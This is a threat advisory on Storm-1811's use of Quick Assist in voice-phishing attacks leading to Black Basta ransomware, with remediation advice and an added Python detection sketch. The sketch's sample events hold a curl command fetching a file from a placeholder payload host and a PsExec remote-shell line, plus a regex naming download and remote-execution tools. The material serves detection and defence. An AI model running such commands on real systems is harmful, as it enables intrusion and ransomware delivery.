May 17, 2024
Severity
High
Analysis Summary
The Microsoft Threat Intelligence team has identified the financially motivated cybercriminal group Storm-1811 using Quick Assist, a legitimate Microsoft tool, in social engineering attacks to deploy Black Basta ransomware.
These attacks involve impersonation through voice phishing, tricking victims into installing remote monitoring tools, and delivering QakBot and Cobalt Strike before deploying ransomware. The threat actors misuse Quick Assist by posing as trusted contacts, such as Microsoft support or company IT staff, to gain access to the device. Once access is granted, they execute commands to download malicious payloads, leading to domain enumeration, lateral movement, and eventual ransomware deployment via PsExec.
To make these attacks more convincing, the company said, Storm-1811 employs link-listing attacks that flood victims' inboxes with subscribed content, making the fraudulent IT support calls seem more legitimate. Microsoft is addressing the misuse of Quick Assist by adding warning messages that alert users to potential tech support scams.
This campaign, which began in mid-April 2024, has targeted various industries, including manufacturing, construction, food and beverage, and transportation. The opportunistic nature of these attacks and their significant impact on victims make ransomware an effective tactic for threat actors.
Black Basta is described by Microsoft as a "closed ransomware offering" rather than a ransomware-as-a-service operation: it is distributed by a small number of actors who rely on others for initial access and malware infrastructure. Since its emergence in April 2022, Black Basta has been deployed following access gained through QakBot and similar malware, which emphasizes the need for organizations to focus on preventing the initial access stage to mitigate ransomware threats.
Organizations are advised to block or uninstall Quick Assist if not in use and train employees to identify tech support scams. These measures are crucial to prevent the initial stages of the attack and reduce the likelihood of ransomware deployment.
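As an added illustration (not code from the advisory or from Microsoft), the following Python sketches the detection logic implied by the chain described above: flag a host where a Quick Assist launch is followed, within a short window, by a download or PsExec style command. The event format, hostnames, timestamps and the payload URL are constructed placeholders.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (not taken from the advisory). Field
# names loosely follow Sysmon Event ID 1; hosts, times and the URL are placeholders.
SAMPLE_EVENTS = [
    '{"ts":"2024-05-10T09:00:00","host":"WS01","image":"C:\\\\Windows\\\\System32\\\\QuickAssist.exe","cmd":"QuickAssist.exe"}',
    '{"ts":"2024-05-10T09:05:30","host":"WS01","image":"C:\\\\Windows\\\\System32\\\\cmd.exe","cmd":"cmd.exe /c curl -o C:\\\\Users\\\\Public\\\\a.zip http://payload.invalid/a.zip"}',
    '{"ts":"2024-05-10T09:12:00","host":"WS01","image":"C:\\\\Tools\\\\PsExec.exe","cmd":"PsExec.exe \\\\\\\\FS01 -s cmd.exe"}',
    '{"ts":"2024-05-10T10:30:00","host":"WS02","image":"C:\\\\Windows\\\\System32\\\\QuickAssist.exe","cmd":"QuickAssist.exe"}',
    '{"ts":"2024-05-10T10:31:00","host":"WS02","image":"C:\\\\Windows\\\\System32\\\\notepad.exe","cmd":"notepad.exe"}',
    '{"ts":"2024-05-10T11:30:00","host":"WS02","image":"C:\\\\Windows\\\\System32\\\\cmd.exe","cmd":"cmd.exe /c curl -o a.zip http://payload.invalid/a.zip"}',
]

WINDOW = timedelta(minutes=30)  # how long after a Quick Assist launch we keep looking
# Download / remote-execution tooling of the kind named in the advisory's attack chain.
SUSPICIOUS = re.compile(r"curl|certutil|bitsadmin|invoke-webrequest|psexec", re.I)

def parse_events(lines):
    events = [json.loads(line) for line in lines]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"])
        e["exe"] = e["image"].rsplit("\\", 1)[-1].lower()  # basename of the image path
    return sorted(events, key=lambda e: e["ts"])

def find_quick_assist_followups(lines, window=WINDOW):
    """One finding per Quick Assist launch that is followed, on the same host and
    within `window`, by at least one download or PsExec style command."""
    by_host = defaultdict(list)
    for e in parse_events(lines):
        by_host[e["host"]].append(e)
    findings = []
    for host, events in by_host.items():
        for i, e in enumerate(events):
            if e["exe"] != "quickassist.exe":
                continue
            hits = [f["cmd"] for f in events[i + 1:]
                    if f["ts"] - e["ts"] <= window and SUSPICIOUS.search(f["cmd"])]
            if hits:
                findings.append({"host": host, "quick_assist_at": e["ts"].isoformat(), "commands": hits})
    return findings

if __name__ == "__main__":
    for f in find_quick_assist_followups(SAMPLE_EVENTS):
        print(f"{f['host']}: Quick Assist at {f['quick_assist_at']}, then:")
        for cmd in f["commands"]:
            print("   ", cmd)
```

WS02 is deliberately not reported: its download happens an hour after the Quick Assist session, outside the window, which is the kind of tuning decision a real rule needs.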
Impact
- Unauthorized Access
- Command Execution
- Sensitive Data Theft
- Financial Loss
Indicators of Compromise
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
- Along with network and system hardening, code hardening should be implemented within the organization so that its websites and software are secure. Use testing tools to detect vulnerabilities in deployed code.
- Enable two-factor authentication.
- In a ransomware attack, the adversary will often delete or encrypt backups if they have access to them. That’s why it’s important to keep offline (preferably off-site), encrypted backups of data and test them regularly.
- Emails from unknown senders should always be treated with caution.
- Never trust or open links and attachments received from unknown sources/senders.
- Updates for operating systems, applications, and firmware should be installed as soon as possible.
- Check Active Directory, servers, workstations, and domain controllers for new or unfamiliar accounts.
- To create secure remote connections, consider installing and using a virtual private network (VPN).